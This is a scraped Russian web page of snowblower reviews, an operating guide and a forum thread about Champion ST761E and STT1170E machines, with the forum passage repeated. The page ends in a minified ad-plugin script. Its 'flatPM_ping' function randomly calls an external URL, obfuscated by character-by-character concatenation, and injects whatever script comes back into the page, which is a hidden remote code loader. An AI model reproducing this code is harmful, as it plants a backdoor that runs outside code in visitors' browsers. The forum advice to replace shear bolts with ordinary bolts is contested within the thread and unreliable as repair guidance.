13 просмотров
Рейтинг статьи
Загрузка...

Снегоуборщик Champion ST 761BS: обзор, отзывы

Снегоуборщик Champion ST761E. Обзор, характеристики, инструкция, отзывы

Российская зима преподносит снежные сюрпризы, а с ними и заботы домовладельцев по уборке своих подворий. Впрочем, решение есть: снегоуборщик Champion ST761E отлично подойдет для расчистки дворов частных домовладений, агрегат можно использовать для уборки подъездных дорожек, парковых аллей и тротуаров.

Мощный двигатель и двухлопастный зазубренный шнек справятся с любыми видами снежного покрова: от свежевыпавшего снега до ледяной корки.

При всех высоких эксплуатационных характеристиках, снегоуборщик Чемпион ST761Eдоступен по весьма умеренной стоимости, его можно приобрести по цене от 49 950 рублей.

Описание

Данная модель снегоочистителя оснащена мощным (7,5 л.с.) двигателем и емким ковшом, шириной 61 сантиметр.

На снегоуборщике Чемпион ST761E установлены 13-дюймовые шины с агрессивным, самоочищающимся протектором, которые обеспечивают высокую проходимость агрегата, даже на мокром и обледеневшем снегу. Для работы в вечернее время суток предусмотрена мощная (до 60 Вт) LED фара.

Преимущества снегоуборщика Champion ST761E:

  • Компактный, хорошо сбалансированный корпус;
  • Двухступенчатая технология выброса снега;
  • Металлический выпускной желоб с углом поворота на 180 0 ;
  • Удобное расположение рычагов управления;
  • Надежный двигатель, адаптированный для эксплуатации в условиях отрицательных температур;
  • Дистанционное управление выпускным желобом;

Инструкция по эксплуатации

С подробным описанием, техническими характеристиками и деталировкой снегоотбрасывателя Чемпион ST761E можно познакомиться, перейдя по ссылке: Ваш браузер не поддерживает фреймы
Скачать Руководство по эксплуатации снегоуборщиком Champion ST656, ST761E, ST762E

Обкатка двигателя производится на протяжении 5 часов. После этого необходимо произвести замену масла. Следующая замена производится через 25 часов, в дальнейшем – через каждые 50 рабочих часов.

Лучше всего использовать зимние масла для четырехтактных моторов с функцией воздушного охлаждения. Производитель рекомендует такие марки: Champion SAE30/ SAE5W30/SAE10W40.

Эксплуатация и обслуживание снегоуборщика Champion ST761E:

  • После покупки снегоуборщика Чемпион ST761E внимательно прочитайте инструкцию по эксплуатации, ознакомьтесь с устройством агрегата, изучите правила техники безопасности, при эксплуатации самоходных снегоочистителей;
  • Проведите сборку машины, в соответствии с указаниями мануала;
  • Смонтируйте рычаги дистанционного управления углом и дальностью выброса снега;
  • Заправьте снегоуборщик свежим бензином марки АИ-92, 95.
  • Залейте масло в картер до необходимого уровня.

  • Проверьте агрегат на предмет масляных и бензиновых подтеков;
  • Установите ручку переключения скоростей в нейтральное положение:
  • Выставьте нужную дальность и направление выброса снега;
  • Запустите двигатель;
  • Включите вращение шнека;
  • Включите оптимальную для ваших условий скорость движения снегоуборщика;
  • При работе не рекомендуется тянуть или подталкивать агрегат в сторону, обратную движению колес. Такие действия могут привести к серьезным поломкам;
  • Обязательно надевайте защитные очки или маску и обувь с рифленой подошвой, которая поможет избежать скольжения оператора;
  • По окончании работы, выключите скорость и вращение шнека, дайте мотору поработать некоторое время (1-2 мин.) на холостых оборотах;
  • В конце сезона слейте бензин и масло и законсервируйте снегоотбрасыватель;

Видео обзор

Обзор снегоуборщиков Champion

Обзор технического обслуживания снегоочистителя Champion

Обзор ремонта фрикционного диска снегоотбрасывателя Champion

Отзывы владельцев

Ефим Кудрявцев, 58 лет, Псковская область:

«В последние годы снега столько насыпает, что лопатой уже никак не справиться. Посоветовался с женой, прочитал отзывы владельцев и решил купить снегоуборщик. Модель Champion ST761E приглянулась мощным двигателем и качественным шнеком, да и цена не сильно кусалась. За три сезона эксплуатации особых недостатков не выявил. Замечу только, что движок любит свежий и качественный бензин.»

Артем Селезнев, 28 лет, Сибирский Федеральный округ:

«За такие деньги лучше Champion ST761E не найти. У меня большой двор и от гаража до улицы метров 100. За час управляюсь с очисткой. При этом никакой усталости. Стемнело – включай свет и продолжай работать. Поломок за два года эксплуатации не было. Менял срезные шпильки, но это по сути расходники. Мотор заводил при минус 27 – запустился с третьего раза, немного прогрел и за работу. Доволен машиной, всем рекомендую.»

Анатолий Григорьев, 34 года, Ивановская область:

«Использую Champion ST761E четвертый сезон. Серьезных неполадок не выявил. Двигатель – зверь, заводится легко, обороты держит, ни разу не регулировал. Один раз погнул лопасти шнека – камень молоток с лета не убрал, вот его и захватило. Надежный и экономичный движок. За полчаса могу очистить весь двор. Из недостатков – очень шумный, да и вибрация присутствует. Достоинства: цена, надежный мотор, качественная сборка. Недостатки: Чемпион шумный, присутствует сильная вибрация.»

Снегоуборщик Champion ST761E. Обзор, характеристики, отзывы

Снегоуборщик Champion ST761E

Снегоуборочная машина Champion ST761E является отличным подспорьем в условиях частного сектора, на дачах, в поселках, а также небольших организациях, где ручная уборка снега отнимает много времени и сил.

Снегоуборщик эффективен при уборке:

  • свежевыпавшего снега;
  • наледи;
  • плотного наста;
  • рыхлого и лежалого и т. д.

Описание

Агрегат оснащен одноцилиндровым четырехтактным бензиновым двигателем производительностью в 6 лошадиных сил. Воздушное охлаждение двигателя увеличивает длительность работы снегоуборщика в несколько раз (так как существует защита от перегрева). 92-й бензин является идеальным топливом для машины.

Специальной формы лопасти шнека (с зазубринами) с легкостью режут лед и передают его на крыльчатку. Там лед измельчается и отбрасывается на 7-13 м в сторону вместе со снегом. Колесный привод с мощными протекторами позволяет самоходному бензиновому снегоуборщику Champion ST761E уверенно преодолевать свой путь без пробуксовок и юза.

Запуск двигателя осуществляется:

  • С помощью ручного стартера и рукоятки.
  • От электрического стартера, подключенного к сети

Вес в 81 килограмм не влияет в отрицательную сторону на маневренность снегоуборщика. Встроенная фара позволяет очищать снег в темное время суток.

Инструкция по эксплуатации

Для того, чтобы работа со снегоуборщиком Champion была максимально производительной и безопасной, необходимо тщательнейшим образом изучить инструкцию, идущую в комплекте с устройством.

На нашем сайте вы можете ознакомится с ее электронным вариантом перейдя по ссылке: Инструкция по эксплуатации снегоуборщика Champion ST761E

Особое внимание следует уделить разделам:

  • нормы безопасности;
  • устройство модели снегоуборщика Чемпион ST761E;
  • поэтапная сборка агрегата;
  • правила эксплуатации снегоуборочной машины;
  • техобслуживание модели ST761E;
  • возможные поломки, их причины и способы устранения.

Видео обзор

Обзор линейки снегоуборщика Champion ST761E

Отзывы владельцев

Евгений, 39 лет:

«Живу в деревне, о снегоуборщике мечтал давно, поэтому, когда купил — руки чесались поскорее начать работу! Китаец не посрамил своего производителя и завелся с первой попытки (я использовал электростартер) несмотря на то, что на дворе было -17 градусов. Рванул вперед мощно, я еле успел среагировать. В управлении довольно прост, слушается хорошо, снег кидает — загляденье (соседи прибегали смотреть на китайское чудо). Идеально очищает на ровных поверхностях, где бугры — лучше не рисковать — сразу срезал болт. Уборка снега очень быстрая и качественная, а я только рядом хожу да направляю — никаких сложностей. Приобретением доволен, рекомендую всем знакомым.»

Михаил, 43 года:

«Покупка снегоуборщика ST761E здорово облегчила мне жизнь, раньше приходилось после снегопада вставать в 4 утра и выходить на ратный подвиг, теперь встаю в 6 и подвиг уже длится не три часа, а 40 минут или час. “Чемпион” запускается в любой мороз (мне это очень нравится так как знаю, каких нервов стоит завести бензиновую тачку в мороз). Работаю с удовольствием, не устаю, немного напрягают мелкие поломки (срезные болты меняю, раз свеча подвела). Стараюсь обеспечить своему снегоуборщику должный уход, поэтому каждый раз перед запуском проверяю и подтягиваю все крепежи — во избежание возникающих из-за этого поломок. Машина у меня уже четвертый год. Правильная консервация на лето исключает проблемы с запуском после простоя.»

Ярослав, 27 лет:

«Снегоуборочный Чемпион это один из видов заработка в зимнее время. Владельцы дачных участков и коттеджей в очереди стоят у меня на очистку, всем нужен идеальный двор и подъезды к гаражам. Владелец магазина тое обращается регулярно. Снегоуборщик я купил для себя, но не думал, что буду с его помощью зарабатывать! Да, стоит он немало, но в моем случае окупил себя полностью. Машина уже не новая, бывают неисправности (срезные болты не в счет), но технику я люблю, поэтому не считаю большой проблемой необходимость переборки карбюратора, или замену свечи. Менял редуктор, ремень. Но все это происходило не сразу, а на протяжении всего срока эксплуатации, поэтому финансовых убытков не ощутил. Старичок не сдается и в этом году еще себя покажет с лучшей стороны, я уверен.»

Снегоуборщик Champion STT1170E

отзыв о первых осющениях пользования такого «гаджета».
Обалденная вещь, снег кидает очень бодро метров на 13 точно если сухой «кашу » на 5 -7 метров
жужит как полагается четко

Технические характеристикиМощность двигателя, л.с. 11
Тип двигателя 4-такт., одноцилиндровый, OHV, охлаж. воздушное
Объем двигателя, см3 337
Объем топливного бака, л 6
Ширина захвата, см 70
Высота захвата, см 54,5
Кол-во скоростей, вперед/назад 6/2
Запуск двигателя от сети 220В
Фары 15Вт
Объем картера 1,1

остается только одна проблема «засыпаю соседей ))) «расход топлива маленький .Если есть у когото какието вопросы с удовольствием отвечу!
тута есть более подробное описание » >

Если есть у кого-то какие-то вопросы с удовольствием отвечу!

У меня такой же, только на колесах. Чем вы меняете срезные болты? В магазине мне посоветовали гвозди «восмидесятку», только они в диаметре 4 мм, а на машине — 6. Пока еще хватает тех, что были в комплекте, но неизбежность неизбежна

leonm , Вы наш клиент )) Выложить Вам фотки редуктора от этой модели снегоуборщика, на который владельцы ставили вместо срезных болтов разного рода крепеж? А еще есть от этой модели два вала сломанные пополам, опять же из-за замены срезных болтов обычными.

SERVER77 , хотелось бы взглянуть для анализа. У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди. Все едины в том, что это дефицит. Я думал, можно выточить такие же, только что там за сталь? Под напильником кажется обычной, но срез больше похож на подкаленую. Была мыслишка попробовать алюминий (у меня есть такой толстый), но думаю, будет рвать без повода. Думал также про то, чтобы сделать пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет? Или местечко, где недорого их купить

leonm написал :
У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди.

Лучше продать новый СУ чем болт

leonm написал :
пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет?

только подбором для конкретной модели ИМХО

Бело написал :
Лучше продать новый СУ чем болт

да уж. отчизна. соотечественники

Бело написал :
только подбором для конкретной модели

сопромат с теоретической механикой вспоминать пора

Сегодня заехал еще в один магазин, там в торговом зале стоит СУ с обычными болтами на шнеке
Спросил, говорят, что сделаны пропилы, как у оригинальных

leonm , Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Доброго всем времени суток,принимайте в свои ряды пожалуйста,и сразу к вам с вопросом-10 лет активно пользую мотоблок нева-мб2к ,на5 году успешно дал дуба родной дрыгатель ,купил и установил субаровский к нему взял девайс мегалодонт который успешно работает и по сей день -снег чистит нормально ремни жрёт с аппетитом,хоть и кидает снег не далеко но прёт как танк,собственно вопрос на днях приобрёл чемп.ст1170 попробовал в деле ,результат-кидает снег абалденно ,но при упоре в небольшую ледышку буксует то одним колесом то другим,дифф там чтоли начали ставить или неисправность блокировки

Ну вот решил разобраться с проблемой сам,снял нижнюю крышку редуктора там стоит межосевой дифференциал ,ни какой блокировки нет,придется колхозить самому ,а работать так невозможно-рыскает влево-вправо на прямой траэктории не держится так что руки потом отваливаются.Может кто-то решал такую проблему или есть какие-то соображения помогите пож,марка СУ Сhampion ST1170E

Извените,может подтупливаю,но решения не вижу,ткните носом пож!-)

правда деталировка скудная — у него поворот курками? посмотрите тут колёсный но принцип такой же —
» >

Дело в том что у меня марка ST1170E а поворот с курков на гусеничном STT1170E и на указанном вами,а на моём только ручки вкл привода шнека и колёс,обидно что при покупке не проинтуичил этот момент,хотя выбирал между данными моделями и имея практически равные ТХ (разница в 5000 роли не играла) смутила не транспортабельность гусеничного с заглушеным двигателем

ОДН , посмотрите внимательно может где то ослабло крепление в дифференциале протяните гайки

Все гайки-болты протянуты,дифф.планетарного типа не имеющий блокировки в любом случае передаёт крутящий момент на колесо имеющее меньшее сцепление с поверхностью,китаёзы думали что СУ с движком в 11лс будет работать по ровному месту и не прикатанному и рыхлому снегу,а вообще для себя я уже давно сделал вывод при покупке чего-либо китайского обязательна «доработка напильником»,так что буду мастрячить блокировку,кстати изготовил цепи на колёса работать стало намного легче

Недавно купил СУ Чемпион st 1170 e. Через 6-7 часов работы заметил, что при работе под нагрузкой стали падать обороты двигателя, как будто не хавтает мощности и двигатель вот-вот заглохнет. Пока ничего не разбирал. Может у кого была такая проблема? Как думаете, — в чем может быть причина? Заранее благодарен за советы

Alex399715 , Вот здесь много информации по СУ » >

SERVER77 написал :
Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Можно смело ставить обычные из сырья чтобы не боятся за редуктор, стоят копейки. А вот оригинальные болты еще та штучка. У меня на хуске 1130 заклинило ротор и заглох двигатель, в результате правка, сварка. Оригинальные «срезные» стоят как вкопанные. 250 р/шт. считаю очень дорого. Да и производители нечестные пытаются нажиться на расходниках. На работе снежник так там давно ставим обычные болты и ничего работает, срезает на ура ничего не клинит.

Снегоуборщик Champion STT1170E

отзыв о первых осющениях пользования такого «гаджета».
Обалденная вещь, снег кидает очень бодро метров на 13 точно если сухой «кашу » на 5 -7 метров
жужит как полагается четко

Технические характеристикиМощность двигателя, л.с. 11
Тип двигателя 4-такт., одноцилиндровый, OHV, охлаж. воздушное
Объем двигателя, см3 337
Объем топливного бака, л 6
Ширина захвата, см 70
Высота захвата, см 54,5
Кол-во скоростей, вперед/назад 6/2
Запуск двигателя от сети 220В
Фары 15Вт
Объем картера 1,1

остается только одна проблема «засыпаю соседей ))) «расход топлива маленький .Если есть у когото какието вопросы с удовольствием отвечу!
тута есть более подробное описание » >

Если есть у кого-то какие-то вопросы с удовольствием отвечу!

У меня такой же, только на колесах. Чем вы меняете срезные болты? В магазине мне посоветовали гвозди «восмидесятку», только они в диаметре 4 мм, а на машине — 6. Пока еще хватает тех, что были в комплекте, но неизбежность неизбежна

leonm , Вы наш клиент )) Выложить Вам фотки редуктора от этой модели снегоуборщика, на который владельцы ставили вместо срезных болтов разного рода крепеж? А еще есть от этой модели два вала сломанные пополам, опять же из-за замены срезных болтов обычными.

SERVER77 , хотелось бы взглянуть для анализа. У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди. Все едины в том, что это дефицит. Я думал, можно выточить такие же, только что там за сталь? Под напильником кажется обычной, но срез больше похож на подкаленую. Была мыслишка попробовать алюминий (у меня есть такой толстый), но думаю, будет рвать без повода. Думал также про то, чтобы сделать пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет? Или местечко, где недорого их купить

leonm написал :
У нас ни у кого из продавцов нет оригинальных «болтов» — они советуют обычные болты, а московские продавцы посоветовали гвозди.

Лучше продать новый СУ чем болт

leonm написал :
пропилы на гвоздях или болтах, чтобы срезало именно в тех местах. Может дадите какой совет?

только подбором для конкретной модели ИМХО

Бело написал :
Лучше продать новый СУ чем болт

да уж. отчизна. соотечественники

Бело написал :
только подбором для конкретной модели

сопромат с теоретической механикой вспоминать пора

Сегодня заехал еще в один магазин, там в торговом зале стоит СУ с обычными болтами на шнеке
Спросил, говорят, что сделаны пропилы, как у оригинальных

leonm , Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Доброго всем времени суток,принимайте в свои ряды пожалуйста,и сразу к вам с вопросом-10 лет активно пользую мотоблок нева-мб2к ,на5 году успешно дал дуба родной дрыгатель ,купил и установил субаровский к нему взял девайс мегалодонт который успешно работает и по сей день -снег чистит нормально ремни жрёт с аппетитом,хоть и кидает снег не далеко но прёт как танк,собственно вопрос на днях приобрёл чемп.ст1170 попробовал в деле ,результат-кидает снег абалденно ,но при упоре в небольшую ледышку буксует то одним колесом то другим,дифф там чтоли начали ставить или неисправность блокировки

Ну вот решил разобраться с проблемой сам,снял нижнюю крышку редуктора там стоит межосевой дифференциал ,ни какой блокировки нет,придется колхозить самому ,а работать так невозможно-рыскает влево-вправо на прямой траэктории не держится так что руки потом отваливаются.Может кто-то решал такую проблему или есть какие-то соображения помогите пож,марка СУ Сhampion ST1170E

Извените,может подтупливаю,но решения не вижу,ткните носом пож!-)

правда деталировка скудная — у него поворот курками? посмотрите тут колёсный но принцип такой же —
» >

Дело в том что у меня марка ST1170E а поворот с курков на гусеничном STT1170E и на указанном вами,а на моём только ручки вкл привода шнека и колёс,обидно что при покупке не проинтуичил этот момент,хотя выбирал между данными моделями и имея практически равные ТХ (разница в 5000 роли не играла) смутила не транспортабельность гусеничного с заглушеным двигателем

ОДН , посмотрите внимательно может где то ослабло крепление в дифференциале протяните гайки

Все гайки-болты протянуты,дифф.планетарного типа не имеющий блокировки в любом случае передаёт крутящий момент на колесо имеющее меньшее сцепление с поверхностью,китаёзы думали что СУ с движком в 11лс будет работать по ровному месту и не прикатанному и рыхлому снегу,а вообще для себя я уже давно сделал вывод при покупке чего-либо китайского обязательна «доработка напильником»,так что буду мастрячить блокировку,кстати изготовил цепи на колёса работать стало намного легче

Недавно купил СУ Чемпион st 1170 e. Через 6-7 часов работы заметил, что при работе под нагрузкой стали падать обороты двигателя, как будто не хавтает мощности и двигатель вот-вот заглохнет. Пока ничего не разбирал. Может у кого была такая проблема? Как думаете, — в чем может быть причина? Заранее благодарен за советы

Alex399715 , Вот здесь много информации по СУ » >

SERVER77 написал :
Болты по 60 руб/шт., практически всегда у нас есть, гвоздь в большинстве случаев не срежется, он согнется и заклинит шнек на валу. Если уж ставить что то самодельное, то только болты с классом прочности 4.8 и с проточкой по месту среза, можно обычным напильником сделать зажав болт в патроне дрели. Фотки редуктора и вала завтра на работе сделаю и выложу.

Можно смело ставить обычные из сырья чтобы не боятся за редуктор, стоят копейки. А вот оригинальные болты еще та штучка. У меня на хуске 1130 заклинило ротор и заглох двигатель, в результате правка, сварка. Оригинальные «срезные» стоят как вкопанные. 250 р/шт. считаю очень дорого. Да и производители нечестные пытаются нажиться на расходниках. На работе снежник так там давно ставим обычные болты и ничего работает, срезает на ура ничего не клинит.

Снегоуборщик Champion STT1170E гусеничный — отзыв

Свои деньги отрабатывает, но не более того

Всем доброго дня!

Зима в этом году наступила стремительно. В связи с этим хочу оставить отзыв об агрегате, который квартирует у нас уже 3 года, помогая расчищать зимние подарки в виде сугробов и наносов.

Не разделяю энтузиазм некоторых продавцов, пишущих, что Champion STT1170E это профессиональная снегоуборочная машина, которая грязь и ржавчину, простите, снег и наледь удалит без труда. Но то, что Champion STT1170E — самый дешевый снегоуборщик на гусеничном ходу — это факт. А гусеницы по снегу и льду идут весомо лучше колес, меньше буксуя и проскальзывая при встрече со льдом и проч.

Основные технические характеристики таковы:

Шнек дествительно большой и широкий — 70см шириной, как обещано.

Поставляется этот аппарат в частично собранном виде и весит 135кг. Поэтому при покупке стоит заранее озаботиться вопросом погрузки/выгрузки, транспортировки и сборки. Мы делали все сами, пользуюясь багажником внедорожника и собственными знаниями по технической части.

Перед первым запуском (да и перед зимним сезоном вообще) снегоуборщик полезно протянуть и прошприцевать. Поставляется он, кстати, без масла в картере. Поэтому около литра (точнее 1.1л) масла для 4-х тактных двигателей придется залить. Собрать самим, поглядывая в инструкцию конечно же осуществимо, но все же я не могу рекомендовать это людям, которые держатся с техникой на Вы.

Бензобак 6л, заправляем все же не 92м, а 95м бензином. Расход зависит от объема и сложности уборки.

Если со сборкой справились, то по функционалу машина Вас только порадует — сама доедет на гусеницах к месту уборки и далее будет работать на 6 скоростях + 2 скорости заднего хода и рычаги поворота, отбрасвая снег как и куда Вам нужно(можно ведь просто почистить, а можно и детям горку накидать), подсвечивая путь фарой, если это необходимо. Пыхтит и тарахтит при этом изрядно.

Есть электростартер — не пользовались ни разу, хорошо заводился «с ручки» и в -10С, и в -20С.

Снег бросает сухой метров на 10-12, мокрый на 1/2 дистанции меньше. Мокрым же сгегом может периодически забиваться шнек и патрубок, которые следует чистить лопаткой прикрепленной к корпусу снегоуборщика. Чистка льда снегоуборщиком это вообще из области фантастики — мелкие ледяные торосы он м.б. и захватит, но для ледяной корки — только ледокол или лом. А ледяные глыбы, ветки и проч.мусор на пути шнека — верная смерть шрузам.

Управление этой машиной требует известной сноровки и координации, чистите ли Вы двор или участок улицы вдоль домов. Для того, чтобы регулировать направление и высоту выброса снега (чтобы не забрасывать вновь уже расчищенные участки и не засыпать соседей), придется частенько останавливаться. Важно отрегулировать и высоту шнека, чтобы не загребал снег вместе с грунтом или наоборот не пропускал слишком много снега под собой. Кроме того, уборка потребует изрядных физических сил — при заезде в ямку, подъеме на крутую горку, заезде на порог гаража даже гусеницы дают пробуксовку и снегоуборщику надо помочь, что м.б. и легко для мужчины, а с меня за время уборки сходит 7 потов. ) А потом звон в ушах и вибрация в руках)))

Еще из наблюдений: по нашим с мужем ощущениям заявленная мощность STT1170E завышена — ну, не выкладывается он на 11 лошадей, на 8-9л.с. от силы. Ну и конечно же «легко и быстро покидать снежок» — это миф. При больших объемах это м.б. и легче, чем лопатой, но не искрометно быстро — технику надо достать, завести, чуть погреть, настроить, самим одеться до зубов (снежная пыль обычно покрывает «водилу» с ног до головы), после уборки поставить машину на место и почистить, а потом еще помахать лопатой в тех местах, где снегоуборщик бесполезен (крыльцо, узкие углы, желоб для ворот). Все эти манипуляции от и до под силу только мужу, мне легче лопатой (которая кстати шла подарком к снегоуборщику при покупке) — и руки после лопаты не дрожат, и бензином не дышу, и голова от шума не трещит. ((работаю в рукавицах, а спина у меня крепкая ))

Напоследок о ценах. В 2013г. брали за 44000р. и именно этих денег он наверное и стоит. А нынешняя цена 67-73000р. для него, по-моему, высоковата.

Рекомендую конечно же тем, у кого действительно есть необходимость в такой технике — например, большая площадь двора и длинная подъездная дорога для расчистки. В противном случае, баловство это — покупать такой дорогой аппарат, которым не факт, что будете пользоваться каждую зиму. И конечно хорошо побольше уметь самим — возить 135кг в сервис-другой, мягко говоря, долго и утомительно.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика